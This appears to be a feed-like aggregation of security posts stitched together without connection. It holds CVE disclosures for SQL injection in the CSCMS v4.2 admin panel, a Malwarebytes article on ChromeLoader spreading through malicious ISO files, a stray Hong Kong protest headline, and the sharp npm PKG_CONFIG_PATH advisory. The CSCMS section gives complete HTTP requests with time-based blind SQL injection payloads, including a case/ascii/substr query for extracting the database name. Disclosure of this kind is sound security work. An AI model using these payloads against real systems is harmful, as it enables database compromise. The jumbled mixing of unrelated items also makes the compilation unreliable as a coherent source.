CSCMS Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the id parameter at /admin.php/pic/admin/pic/del.

First create an image and then delete it. When deleting an image, SQL injection is generated. The injection point is ID

    POST /admin.php/pic/admin/pic/del?yid=3 HTTP/1.1
    Host: cscms.test
    Content-Length: 21
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/pic/admin/pic?yid=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_session=193ad5fapoc2b6jr5pdtcpl7gp5fmjlp; cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA
    Connection: close
    
    id=1)and(sleep(5))--+
    

Because the first letter of the background database name is "c", it sleeps for 5 seconds,so the vulnerablity exisit

CVE-2022-29660: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #25 · chshcms/cscms

CSCMS Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the id parameter at /admin.php/news/admin/topic/save.

SQL injection vulnerability exists in Cscms music portal system v4.2 news\_Topic.php\_del

**Details**

Add a news topic after the administrator logs in

    POST /admin.php/news/admin/topic/save HTTP/1.1
    Host: cscms.test
    Content-Length: 150
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/news/admin/topic/edit
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=b3vaeo61gbiune90rtjsdcqg2am7gqgl
    Connection: close
    
    name=1&tid=0&yid=0&bname=1&addtime=ok&pic=&toppic=&hits=0&yhits=0&zhits=0&rhits=0&skins=topic-show.html&neir=&file=&title=&keywords=&description=&id=0
    

When deleting news topics, malicious statements can be constructed to realize SQL injection

    POST /admin.php/news/admin/topic/del HTTP/1.1
    Host: cscms.test
    Content-Length: 21
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/news/admin/topic?v=705
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=b3vaeo61gbiune90rtjsdcqg2am7gqgl
    Connection: close
    
    id=3)and(sleep(5))--+
    

The payload executes and sleeps for 5 seconds,so construct payload to Blast database

Because the first letter of the background database name is "c", it sleeps for 5 seconds,so the Injection vulnerability exists

CVE-2022-29665: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #19 · chshcms/cscms

CSCMS Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the id parameter at /admin.php/pic/admin/type/pl_save.

There is an injection when adding an album to save, and the injection point is ID

    POST /admin.php/pic/admin/type/pl_save HTTP/1.1
    Host: cscms.test
    Content-Length: 38
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/pic/admin/type?yid=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=n7gacaf0cfrdgd78692oaa4f2li036fp;XDEBUG_SESSION=PHPSTORM
    Connection: close
    
    xid=1&csid[]=cid&id=7)and(sleep(5))--+
    

(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)

Because the first letter of the background database name is "c", it sleeps for 5 seconds,so the vulnerablity exisit

CVE-2022-29664: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #23 · chshcms/cscms

CSCMS Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via /admin.php/pic/admin/pic/hy. This vulnerability is exploited via restoring deleted photos.

**Details**

there is a Injection vulnerability exists in pic\_Pic.php\_hy

Injection occurs when restoring deleted photos from the trash

    GET /admin.php/pic/admin/pic/hy?id=3)and(sleep(5))--+ HTTP/1.1
    Host: cscms.test
    Accept: application/json, text/javascript, */*; q=0.01
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    X-Requested-With: XMLHttpRequest
    Referer: http://cscms.test/admin.php/pic/admin/pic?yid=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=o58jedqf4p0pobv4atdiuae0n6015865
    Connection: close
    

Discovery success makes the server sleep,Construct payload,Then construct payload to blast database

Because the first letter of the background database name is "c", it sleeps for 5 seconds,so the vulnerablity exisit

CVE-2022-29667: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #26 · chshcms/cscms

CSCMS Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the id parameter at /admin.php/pic/admin/type/hy.

Then delete the album,When restoring the album in the recycle bin, construct malicious statements to realize SQL injection

    POST /admin.php/pic/admin/type/hy HTTP/1.1
    Host: cscms.test
    Content-Length: 21
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/pic/admin/type?yid=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=n7gacaf0cfrdgd78692oaa4f2li036fp
    Connection: close
    
    id=7)and(sleep(5))--+
    

Because the first letter of the background database name is "c", it sleeps for 5 seconds,so the vulnerability exist

CVE-2022-29663: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #22 · chshcms/cscms

CSCMS Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the id parameter at /admin.php/pic/admin/lists/zhuan.

    POST /admin.php/pic/admin/lists/zhuan HTTP/1.1
    Host: cscms.test
    Content-Length: 21
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/pic/admin/type?yid=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=n7gacaf0cfrdgd78692oaa4f2li036fp;XDEBUG_SESSION=PHPSTORM
    Connection: close
    
    id[]=(sleep(5))&cid=5
    

(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)

Because the first letter of the background database name is "c", it sleeps for 5 seconds,so the vulnerablity exisit

CVE-2022-29666: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #24 · chshcms/cscms

ChromeLoader is working its way into Chrome browsers via ISO images claiming to offer cracked games. What are the dangers?
The post ChromeLoader targets Chrome Browser users with malicious ISO files appeared first on Malwarebytes Labs.

If you’re on the hunt for cracked software or games, be warned. Rogue ISO archive files are looking to infect your systems with ChromeLoader. If you think campaigns such as this only target Windows users, you’d sadly be very much mistaken. The attack sucks in several operating systems and even uses mobiles as bait to draw in additional victims.

**Of PowerShells and ISOs**

An optimal disc image (ISO) is a disk image containing everything written to an optical disc. If someone copied a DVD or CD-ROM, they may end up with an ISO. With the right software, these files can be mounted and read as if the device was reading from a physical disc.

If a malware author claims to be offering cracked or pirated versions of games or software, an ISO is frequently what’s on offer. They may be promoted on social media, video sites, game crack portals, or torrents. Sadly for would-be file downloaders, they’re frequently booby trapped with malware.

PowerShell is a way to automate tasks and comes complete with  a command line interface. It can be used by infection files to execute specific commands and get the infection ball rolling. This ChromeLoader attack combines both Powershell and ISOs to compromise systems.

**How does ChromeLoader infect a device?**

The flow is as follows:

1.  Bogus files are promoted on Twitter and other services. Some victims are simply grabbing the infection from rogue sites and/or torrents.
2.  Some social media posts promote supposedly cracked Android games via QR codes which direct would-be gamers to rogue websites.
3.  Double clicking the ISO file mounts it as a virtual CD-ROM. The executable in the ISO claims to be the content the victim was originally looking for.
4.  ChromeLoader makes use of a PowerShell command to load in a Chrome extension from a remote resource. PowerShell then removes the scheduled task and the victim is none the wiser that their browser has been compromised. At this point, search results cannot be trusted and bogus entries will be displayed to the user.
5.  As BleepingComputer notes, users of macOS are also at risk from this attack. Instead of ISO, attackers use DMG (Apple Disk Image) files, which is a more common format on that OS.

**Tips to avoid ChromeLoader**

1.  Searching for cracked games and software is a very risky business. Many sites promoting malware masquerading as “genuine” crack portals are hard to spot. If you’re downloading a torrent, you may well be rolling dice with regard to the digital health of your devices. Deep sales on games and products are fairly common. Unless it’s a brand new title, it may be worth waiting for a product-centric sale.
2.  In Chrome, Click the **More** icon, then **More Tools** -> **Extensions**. From there, you can see what’s installed, what is active or disabled, along with additional information about all extensions present. Google also has advice for resetting browser settings and additional clean-up methods.
3.  Keeping your security software up to date and running regular scans helps prevent this kind of attack. You should also always scan a downloaded file before making use of it.
4.  Keep in mind that rogue extensions don’t just come from bad websites or rogue downloads. The Chrome web store itself has been known to play host to bad files. Always check reviews, developer information, extension permissions and anything else of note before installing a new extension to your browser.

ChromeLoader targets Chrome Browser users with malicious ISO files

During the protests in Hong Kong, young people carried laser pointers, umbrellas, and plastic ties—objects that sometimes led to their arrest, and years of legal limbo.

‘How Are They Weapons? That’s Only a Flashlight!’

sharp is an application for Node.js image processing. Prior to version 0.30.5, there is a possible vulnerability in logic that is run only at `npm install` time when installing versions of `sharp` prior to the latest v0.30.5. If an attacker has the ability to set the value of the `PKG_CONFIG_PATH` environment variable in a build environment then they might be able to use this to inject an arbitrary command at `npm install` time. This is not part of any runtime code, does not affect Windows users at all, and is unlikely to affect anyone that already cares about the security of their build environment. This problem is fixed in version 0.30.5.

There's a possible vulnerability in logic that is run only at npm install time when installing versions of sharp prior to the latest v0.30.5.

This is not part of any runtime code, does not affect Windows users at all, and is unlikely to affect anyone that already cares about the security of their build environment. However, out of an abundance of caution, I've created this advisory.

If an attacker has the ability to set the value of the PKG_CONFIG_PATH environment variable in a build environment then they might be able to use this to inject an arbitrary command at npm install time.

I've used the Common Vulnerability Scoring System (CVSS) calculator to determine the maximum possible impact, which suggests a "medium" score of 5.9, but for most people the real impact will be dealing with the noise from automated security tooling that this advisory will bring.

AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C/CR:X/IR:X/AR:X/MAV:X/MAC:X/MPR:X/MUI:R/MS:X/MC:X/MI:X/MA:X

This problem was fixed in commit a6aeef6 and published as part of sharp v0.30.5.

Thank you very much to @dwisiswant0 for the responsible disclosure.

Remember: if an attacker has control over environment variables in your build environment then you have a bigger problem to deal with than this issue.

Tag

#windows